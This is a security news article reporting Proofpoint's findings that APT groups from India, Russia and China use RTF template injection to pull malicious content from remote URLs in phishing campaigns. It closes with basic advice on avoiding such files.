In their latest phishing attacks, three APT hacking gangs from India, Russia, and China were discovered employing a new RTF (rich text format) template injection approach. It is a straightforward but effective method to download malicious material from a remote URL, and security researchers believe many threat actors will soon adopt it. In March 2021, Proofpoint researchers discovered the first instances of weaponized RTF template injection, and since then, actors have been continuously improving the approach.
RTF files are a Microsoft-created document format that can be opened with Microsoft Word, WordPad, and other applications present on practically all operating systems. You may use an RTF Template to specify how the text in the document must be formatted when making RTF files. These templates are local files that must be imported into an RTF viewer before the file’s contents can be shown to format appropriately.
Threat actors are currently leveraging this valid capability to get a URL resource instead of a local file resource, even though RTF Templates are supposed to be hosted locally. Threat actors can use this replacement to inject malicious payloads into Microsoft Word or execute NTLM authentication towards a remote URL to thieve Windows credentials. Also, because these files are delivered as RTF Templates, they are more likely to avoid detecting phishing lures because they are not included in the RTF files at the time of transfer.
Since RTF Template injections are simple to do using a hex editor and aren’t as quickly discovered by antivirus scanners, they’re likely to grow increasingly popular among threat actors.
According to Proofpoint’s researchers, “the viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector.”
“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”
Moreover, because the malicious material is received from a remote URL, threat actors can change their campaigns in real-time to employ alternative payloads or dangerous behaviors. To protect yourself from this attack, avoid downloading and opening RTF files from unsolicited emails, scan them with an antivirus program, and keep your Microsoft Office up to date by installing the latest security updates.